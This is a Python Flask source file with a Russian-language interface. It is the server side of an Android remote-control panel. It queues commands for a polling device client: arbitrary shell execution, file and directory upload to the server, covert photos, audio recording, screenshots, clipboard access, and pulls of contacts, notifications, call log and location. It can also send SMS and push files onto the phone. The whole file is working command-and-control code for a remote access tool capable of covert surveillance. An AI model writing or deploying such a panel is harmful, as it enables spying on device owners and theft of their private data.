from flask import Flask, request, render_template_string, jsonify, send_from_directory, url_for import os import datetime import uuid import werkzeug.utils import json import math app = Flask(__name__) app.config['UPLOAD_FOLDER'] = 'uploads_from_client' app.config['FILES_TO_CLIENT_FOLDER'] = 'uploads_to_client' os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True) os.makedirs(app.config['FILES_TO_CLIENT_FOLDER'], exist_ok=True) pending_command = None command_output = "Ожидание команд..." last_client_heartbeat = None current_client_path = "~" file_to_send_to_client = None device_status_info = {} notifications_history = [] contacts_list = [] HTML_TEMPLATE = """ ПУ Android

ПУ Android

Статус клиента неизвестен

Общая информация

Добро пожаловать в панель управления. Выберите действие из меню слева.

Вывод последней операции:

Ожидание вывода...

Статус устройства

Батарея

Заряд: Н/Д

Геолокация

Локация: Н/Д

Запущенные процессы (пользователя Termux)

Процессы: Н/Д

Уведомления устройства

Список уведомлений:

Запросите список уведомлений.

Контакты

Список контактов:

Запросите список контактов.

Сообщения и звонки

Отправить SMS

Журнал звонков

Результат операции:


                 

Файловый менеджер (Клиент)

Текущий путь на клиенте: ~

Содержимое директории:

  • Запросите содержимое директории.

Загрузить файл НА устройство

Выполнить команду на устройстве

Вывод команды:


                 

Мультимедиа

Результат операции:


                 

Буфер обмена

Результат операции с буфером:


                 

Утилиты

Результат операции:


                 

Системные функции

Синтез речи (TTS)

Вибрация

Фонарик

Информация

Результат операции:


                

Файлы, загруженные С клиента на сервер

  • Нет загруженных файлов.
""" @app.route('/') def index(): return render_template_string(HTML_TEMPLATE) @app.route('/send_command', methods=['POST']) def handle_send_command(): global pending_command, command_output data = request.json command_output = "Ожидание выполнения..." command_type = data.get('command_type') if command_type == 'list_files': pending_command = {'type': 'list_files', 'path': data.get('path', '.')} elif command_type == 'request_download_file': pending_command = {'type': 'upload_to_server', 'filename': data.get('filename')} elif command_type == 'delete_file': pending_command = {'type': 'delete_file', 'filename': data.get('filename')} elif command_type == 'zip_and_upload_dir': pending_command = {'type': 'zip_and_upload_dir', 'path': data.get('path')} elif command_type == 'take_photo': pending_command = {'type': 'take_photo', 'camera_id': data.get('camera_id', '0')} elif command_type == 'record_audio': pending_command = {'type': 'record_audio', 'duration': data.get('duration', '5')} elif command_type == 'screenshot': pending_command = {'type': 'screenshot'} elif command_type == 'shell': pending_command = {'type': 'shell', 'command': data.get('command')} elif command_type == 'receive_file': server_filename = data.get('server_filename') target_path = data.get('target_path_on_device') file_path = os.path.join(app.config['FILES_TO_CLIENT_FOLDER'], server_filename) if server_filename and target_path and os.path.exists(file_path): pending_command = { 'type': 'receive_file', 'download_url': url_for('download_to_client', filename=server_filename, _external=True), 'target_path': target_path, 'original_filename': server_filename.split('_', 1)[1] if '_' in server_filename else server_filename } else: command_output = f"Ошибка: Файл {server_filename} не найден на сервере." elif command_type == 'clipboard_get': pending_command = {'type': 'clipboard_get'} elif command_type == 'clipboard_set': pending_command = {'type': 'clipboard_set', 'text': data.get('text', '')} elif command_type == 'open_url': pending_command = {'type': 'open_url', 'url': data.get('url')} elif command_type == 'get_device_status': pending_command = {'type': 'get_device_status', 'item': data.get('item')} elif command_type == 'get_notifications': pending_command = {'type': 'get_notifications'} elif command_type == 'get_contacts': pending_command = {'type': 'get_contacts'} elif command_type == 'send_sms': pending_command = {'type': 'send_sms', 'number': data.get('number'), 'text': data.get('text')} elif command_type == 'get_call_log': pending_command = {'type': 'get_call_log'} elif command_type == 'tts_speak': pending_command = {'type': 'tts_speak', 'text': data.get('text')} elif command_type == 'vibrate': pending_command = {'type': 'vibrate', 'duration': data.get('duration', '1000')} elif command_type == 'torch': pending_command = {'type': 'torch', 'state': data.get('state', 'off')} elif command_type == 'get_device_info': pending_command = {'type': 'get_device_info'} elif command_type == 'get_wifi_info': pending_command = {'type': 'get_wifi_info'} else: command_output = "Неизвестный тип команды." return jsonify({'status': 'command_queued'}) @app.route('/get_command', methods=['GET']) def get_command(): global pending_command if pending_command: cmd_to_send = pending_command pending_command = None return jsonify(cmd_to_send) return jsonify(None) @app.route('/submit_client_data', methods=['POST']) def submit_client_data(): global command_output, last_client_heartbeat, current_client_path, device_status_info, notifications_history, contacts_list data = request.json if not data: return jsonify({'status': 'error', 'message': 'No data received'}), 400 last_client_heartbeat = datetime.datetime.utcnow().isoformat() + "Z" if 'output' in data: command_output = data['output'] if 'current_path' in data: current_client_path = data['current_path'] if 'device_status_update' in data: device_status_info.update(data['device_status_update']) if 'notifications_update' in data: notifications_history = data['notifications_update'] if 'contacts_update' in data: contacts_list = data['contacts_update'] if 'heartbeat' in data and data['heartbeat'] and not any(k in data for k in ['output', 'device_status_update', 'notifications_update', 'contacts_update']): command_output = "Клиент онлайн." return jsonify({'status': 'data_received'}) @app.route('/upload_from_client', methods=['POST']) def upload_from_client_route(): global command_output, last_client_heartbeat last_client_heartbeat = datetime.datetime.utcnow().isoformat() + "Z" if 'file' not in request.files: return jsonify({'status': 'error', 'message': 'No file part'}) file = request.files['file'] if file.filename == '': return jsonify({'status': 'error', 'message': 'No selected file'}) if file: filename = werkzeug.utils.secure_filename(file.filename) filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename) base, ext = os.path.splitext(filename) counter = 1 while os.path.exists(filepath): filename = f"{base}_{counter}{ext}" filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename) counter += 1 try: file.save(filepath) command_output = f"Файл '{filename}' успешно загружен С клиента." return jsonify({'status': 'success', 'filename': filename}) except Exception as e: command_output = f"Ошибка сохранения файла от клиента: {str(e)}" return jsonify({'status': 'error', 'message': str(e)}) @app.route('/get_status_output', methods=['GET']) def get_status_output_route(): global command_output, last_client_heartbeat, current_client_path, device_status_info, notifications_history, contacts_list return jsonify({ 'output': command_output, 'last_heartbeat': last_client_heartbeat, 'current_path': current_client_path, 'device_status': device_status_info, 'notifications': notifications_history, 'contacts': contacts_list }) @app.route('/uploads_from_client/') def uploaded_file_from_client(filename): return send_from_directory(app.config['UPLOAD_FOLDER'], filename) @app.route('/delete_uploaded_file/', methods=['POST']) def delete_uploaded_file_route(filename): try: secure_name = werkzeug.utils.secure_filename(filename) file_path = os.path.join(app.config['UPLOAD_FOLDER'], secure_name) if os.path.exists(file_path) and os.path.isfile(file_path): os.remove(file_path) return jsonify({'status': 'success', 'message': f'Файл {secure_name} удален.'}) else: return jsonify({'status': 'error', 'message': 'Файл не найден.'}), 404 except Exception as e: return jsonify({'status': 'error', 'message': str(e)}), 500 @app.route('/list_uploaded_files') def list_uploaded_files_route(): files_details = [] upload_folder = app.config['UPLOAD_FOLDER'] image_extensions = {'.jpg', '.jpeg', '.png', '.gif', '.bmp', '.webp'} try: for f_name in os.listdir(upload_folder): f_path = os.path.join(upload_folder, f_name) if os.path.isfile(f_path): stats = os.stat(f_path) files_details.append({ 'name': f_name, 'size': stats.st_size, 'mtime': stats.st_mtime, 'is_image': os.path.splitext(f_name)[1].lower() in image_extensions }) except Exception: pass files_details.sort(key=lambda x: x['mtime'], reverse=True) return jsonify({'files': files_details}) @app.route('/upload_to_server_for_client', methods=['POST']) def upload_to_server_for_client_route(): if 'file_to_device' not in request.files: return jsonify({'status': 'error', 'message': 'No file part'}), 400 file = request.files['file_to_device'] target_path = request.form.get('target_path_on_device') if file.filename == '' or not target_path: return jsonify({'status': 'error', 'message': 'Missing file or path'}), 400 original_filename = werkzeug.utils.secure_filename(file.filename) server_filename = str(uuid.uuid4()) + "_" + original_filename filepath = os.path.join(app.config['FILES_TO_CLIENT_FOLDER'], server_filename) try: file.save(filepath) return jsonify({ 'status': 'success', 'server_filename': server_filename, 'target_path_on_device': target_path }) except Exception as e: return jsonify({'status': 'error', 'message': str(e)}), 500 @app.route('/download_to_client/') def download_to_client(filename): return send_from_directory(app.config['FILES_TO_CLIENT_FOLDER'], filename) if __name__ == '__main__': app.run(host='0.0.0.0', port=7860, debug=False)